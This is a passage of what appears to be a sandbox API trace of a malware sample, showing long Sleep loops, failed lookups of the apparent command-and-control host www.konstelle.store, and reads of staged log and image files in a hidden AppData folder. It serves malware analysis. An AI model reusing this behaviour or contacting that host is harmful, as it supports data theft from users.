(dwMilliseconds=0x7d0) [0284.376] Sleep (dwMilliseconds=0x7d0) [0284.377] Sleep (dwMilliseconds=0x7d0) [0284.379] Sleep (dwMilliseconds=0x7d0) [0284.380] Sleep (dwMilliseconds=0x7d0) [0284.382] Sleep (dwMilliseconds=0x7d0) [0284.383] Sleep (dwMilliseconds=0x7d0) [0284.385] Sleep (dwMilliseconds=0x7d0) [0284.386] Sleep (dwMilliseconds=0x7d0) [0284.388] Sleep (dwMilliseconds=0x7d0) [0284.389] Sleep (dwMilliseconds=0x7d0) [0284.391] Sleep (dwMilliseconds=0x7d0) [0284.392] Sleep (dwMilliseconds=0x7d0) [0284.395] Sleep (dwMilliseconds=0x7d0) [0284.396] Sleep (dwMilliseconds=0x7d0) [0284.398] Sleep (dwMilliseconds=0x7d0) [0284.399] Sleep (dwMilliseconds=0x7d0) [0284.401] Sleep (dwMilliseconds=0x7d0) [0284.402] Sleep (dwMilliseconds=0x7d0) [0284.404] Sleep (dwMilliseconds=0x7d0) [0284.405] Sleep (dwMilliseconds=0x7d0) [0284.407] Sleep (dwMilliseconds=0x7d0) [0284.408] Sleep (dwMilliseconds=0x7d0) [0284.410] Sleep (dwMilliseconds=0x7d0) [0284.411] Sleep (dwMilliseconds=0x7d0) [0284.413] Sleep (dwMilliseconds=0x7d0) [0284.414] Sleep (dwMilliseconds=0x7d0) [0284.416] Sleep (dwMilliseconds=0x7d0) [0284.417] Sleep (dwMilliseconds=0x7d0) [0284.419] Sleep (dwMilliseconds=0x7d0) [0284.420] Sleep (dwMilliseconds=0x7d0) [0284.422] Sleep (dwMilliseconds=0x7d0) [0284.423] Sleep (dwMilliseconds=0x7d0) [0284.425] Sleep (dwMilliseconds=0x7d0) [0284.426] Sleep (dwMilliseconds=0x7d0) [0284.428] Sleep (dwMilliseconds=0x7d0) [0284.429] Sleep (dwMilliseconds=0x7d0) [0284.431] Sleep (dwMilliseconds=0x7d0) [0284.432] Sleep (dwMilliseconds=0x7d0) [0284.434] Sleep (dwMilliseconds=0x7d0) [0284.435] Sleep (dwMilliseconds=0x7d0) [0284.437] Sleep (dwMilliseconds=0x7d0) [0284.438] Sleep (dwMilliseconds=0x7d0) [0284.440] Sleep (dwMilliseconds=0x7d0) [0284.441] Sleep (dwMilliseconds=0x7d0) [0284.443] Sleep (dwMilliseconds=0x7d0) [0284.444] Sleep (dwMilliseconds=0x7d0) [0284.446] Sleep (dwMilliseconds=0x7d0) [0284.447] Sleep (dwMilliseconds=0x7d0) [0284.449] Sleep (dwMilliseconds=0x7d0) [0284.450] Sleep (dwMilliseconds=0x7d0) [0284.452] Sleep (dwMilliseconds=0x7d0) [0284.453] Sleep (dwMilliseconds=0x7d0) [0284.455] Sleep (dwMilliseconds=0x7d0) [0284.457] Sleep (dwMilliseconds=0x7d0) [0284.458] Sleep (dwMilliseconds=0x7d0) [0284.460] Sleep (dwMilliseconds=0x7d0) [0284.461] Sleep (dwMilliseconds=0x7d0) [0284.463] Sleep (dwMilliseconds=0x7d0) [0284.464] Sleep (dwMilliseconds=0x7d0) [0284.466] Sleep (dwMilliseconds=0x7d0) [0284.467] Sleep (dwMilliseconds=0x7d0) [0284.469] Sleep (dwMilliseconds=0x7d0) [0284.470] Sleep (dwMilliseconds=0x7d0) [0284.472] Sleep (dwMilliseconds=0x7d0) [0284.473] Sleep (dwMilliseconds=0x7d0) [0284.475] Sleep (dwMilliseconds=0x7d0) [0284.476] Sleep (dwMilliseconds=0x7d0) [0284.478] Sleep (dwMilliseconds=0x7d0) [0284.479] Sleep (dwMilliseconds=0x7d0) [0284.481] Sleep (dwMilliseconds=0x7d0) [0284.482] Sleep (dwMilliseconds=0x7d0) [0284.484] Sleep (dwMilliseconds=0x7d0) [0284.486] Sleep (dwMilliseconds=0x7d0) [0284.487] Sleep (dwMilliseconds=0x7d0) [0284.489] Sleep (dwMilliseconds=0x7d0) [0284.490] Sleep (dwMilliseconds=0x7d0) [0284.492] Sleep (dwMilliseconds=0x7d0) [0284.493] Sleep (dwMilliseconds=0x7d0) [0284.495] Sleep (dwMilliseconds=0x7d0) [0284.498] Sleep (dwMilliseconds=0x7d0) [0284.500] Sleep (dwMilliseconds=0x7d0) [0284.501] Sleep (dwMilliseconds=0x7d0) [0284.503] Sleep (dwMilliseconds=0x7d0) [0284.504] Sleep (dwMilliseconds=0x7d0) [0284.506] Sleep (dwMilliseconds=0x7d0) [0284.507] Sleep (dwMilliseconds=0x7d0) [0284.509] Sleep (dwMilliseconds=0x7d0) [0284.510] Sleep (dwMilliseconds=0x7d0) [0284.512] Sleep (dwMilliseconds=0x7d0) [0284.513] Sleep (dwMilliseconds=0x7d0) [0284.515] Sleep (dwMilliseconds=0x7d0) [0284.516] Sleep (dwMilliseconds=0x7d0) [0284.518] Sleep (dwMilliseconds=0x7d0) [0284.519] Sleep (dwMilliseconds=0x7d0) [0284.521] Sleep (dwMilliseconds=0x7d0) [0284.522] Sleep (dwMilliseconds=0x7d0) [0284.524] Sleep (dwMilliseconds=0x7d0) [0284.525] Sleep (dwMilliseconds=0x7d0) [0284.527] Sleep (dwMilliseconds=0x7d0) [0284.528] socket (af=2, type=1, protocol=6) returned 0x24ac [0284.528] getaddrinfo (in: pNodeName="www.konstelle.store", pServiceName="80", pHints=0x8790978*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87909a8 | out: ppResult=0x87909a8*=0x0) returned 11001 [0284.529] Sleep (dwMilliseconds=0x7d0) [0284.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.531] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.531] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0284.531] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0284.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.531] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.531] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.531] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0284.531] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.531] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.531] NtClose (Handle=0x1b78) returned 0x0 [0284.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.531] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.532] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0284.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.532] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.532] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0284.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.532] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.532] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.532] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.532] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.532] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.532] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.532] NtClose (Handle=0x1b78) returned 0x0 [0284.532] getaddrinfo (in: pNodeName="www.konstelle.store", pServiceName="80", pHints=0x8790978*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87909a8 | out: ppResult=0x87909a8*=0x0) returned 11001 [0284.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.533] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.534] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.534] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.534] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.534] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.534] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0284.534] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0284.534] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0284.534] NtClose (Handle=0x1b78) returned 0x0 [0284.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.534] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.534] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.534] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0284.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.534] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0284.534] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0284.534] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0284.534] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0284.534] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x1b78, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0284.535] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0284.535] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0284.535] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0284.535] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0284.535] NtClose (Handle=0x1b78) returned 0x0 [0284.535] getaddrinfo (in: pNodeName="www.konstelle.store", pServiceName="80", pHints=0x8790978*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87909a8 | out: ppResult=0x87909a8*=0x0) returned 11001 [0284.536] Sleep (dwMilliseconds=0x7d0) [0284.537] Sleep (dwMilliseconds=0x7d0) [0284.539] Sleep (dwMilliseconds=0x7d0) [0284.540] Sleep (dwMilliseconds=0x7d0) [0284.542] Sleep (dwMilliseconds=0x7d0) [0284.543] Sleep (dwMilliseconds=0x7d0) [0284.545] Sleep (dwMilliseconds=0x7d0) [0284.546] Sleep (dwMilliseconds=0x7d0) [0284.548] Sleep (dwMilliseconds=0x7d0) [0284.549] Sleep (dwMilliseconds=0x7d0) [0284.551] Sleep (dwMilliseconds=0x7d0) [0284.552] Sleep (dwMilliseconds=0x7d0) [0284.554] Sleep (dwMilliseconds=0x7d0) [0284.555] Sleep (dwMilliseconds=0x7d0) [0284.557] Sleep (dwMilliseconds=0x7d0) [0284.558] Sleep (dwMilliseconds=0x7d0) [0284.560] Sleep (dwMilliseconds=0x7d0) [0284.561] Sleep (dwMilliseconds=0x7d0) [0284.563] Sleep (dwMilliseconds=0x7d0) [0284.564] Sleep (dwMilliseconds=0x7d0) [0284.566] Sleep (dwMilliseconds=0x7d0) [0284.567] Sleep (dwMilliseconds=0x7d0) [0284.569] Sleep (dwMilliseconds=0x7d0) [0284.570] Sleep (dwMilliseconds=0x7d0) [0284.572] Sleep (dwMilliseconds=0x7d0) [0284.573] Sleep (dwMilliseconds=0x7d0) [0284.575] Sleep (dwMilliseconds=0x7d0) [0284.576] Sleep (dwMilliseconds=0x7d0) [0284.578] Sleep (dwMilliseconds=0x7d0) [0284.579] Sleep (dwMilliseconds=0x7d0) [0284.581] Sleep (dwMilliseconds=0x7d0) [0284.582] Sleep (dwMilliseconds=0x7d0) [0284.584] Sleep (dwMilliseconds=0x7d0) [0284.585] Sleep (dwMilliseconds=0x7d0) [0284.587] Sleep (dwMilliseconds=0x7d0) [0284.588] Sleep (dwMilliseconds=0x7d0) [0284.590] Sleep (dwMilliseconds=0x7d0) [0284.591] Sleep (dwMilliseconds=0x7d0) [0284.593] Sleep (dwMilliseconds=0x7d0) [0284.594] Sleep (dwMilliseconds=0x7d0) [0284.597] Sleep (dwMilliseconds=0x7d0) [0284.598] Sleep (dwMilliseconds=0x7d0) [0284.600] Sleep (dwMilliseconds=0x7d0) [0284.601] Sleep (dwMilliseconds=0x7d0) [0284.603] Sleep (dwMilliseconds=0x7d0) [0284.604] Sleep (dwMilliseconds=0x7d0) [0284.606] Sleep (dwMilliseconds=0x7d0) [0284.607] Sleep (dwMilliseconds=0x7d0) [0284.609] Sleep (dwMilliseconds=0x7d0) [0284.610] Sleep (dwMilliseconds=0x7d0) [0284.612] Sleep (dwMilliseconds=0x7d0) [0284.613] Sleep (dwMilliseconds=0x7d0) [0284.615] Sleep (dwMilliseconds=0x7d0) [0284.616] Sleep (dwMilliseconds=0x7d0) [0284.618] Sleep (dwMilliseconds=0x7d0) [0284.619] Sleep (dwMilliseconds=0x7d0) [0284.621] Sleep (dwMilliseconds=0x7d0) [0284.622] Sleep (dwMilliseconds=0x7d0) [0284.624] Sleep (dwMilliseconds=0x7d0) [0284.625] Sleep (dwMilliseconds=0x7d0) [0284.627] Sleep (dwMilliseconds=0x7d0) [0284.628] Sleep (dwMilliseconds=0x7d0) [0284.630] Sleep (dwMilliseconds=0x7d0) [0284.631] Sleep (dwMilliseconds=0x7d0) [0284.633] Sleep (dwMilliseconds=0x7d0) [0284.634] Sleep (dwMilliseconds=0x7d0) [0284.636] Sleep (dwMilliseconds=0x7d0) [0284.637] Sleep (dwMilliseconds=0x7d0) [0284.639] Sleep (dwMilliseconds=0x7d0) [0284.640] Sleep (dwMilliseconds=0x7d0) [0284.642] Sleep (dwMilliseconds=0x7d0) [0284.643] Sleep (dwMilliseconds=0x7d0) [0284.645] Sleep (dwMilliseconds=0x7d0) [0284.646] Sleep (dwMilliseconds=0x7d0) [0284.648] Sleep (dwMilliseconds=0x7d0) [0284.649] Sleep (dwMilliseconds=0x7d0) [0284.651] Sleep (dwMilliseconds=0x7d0) 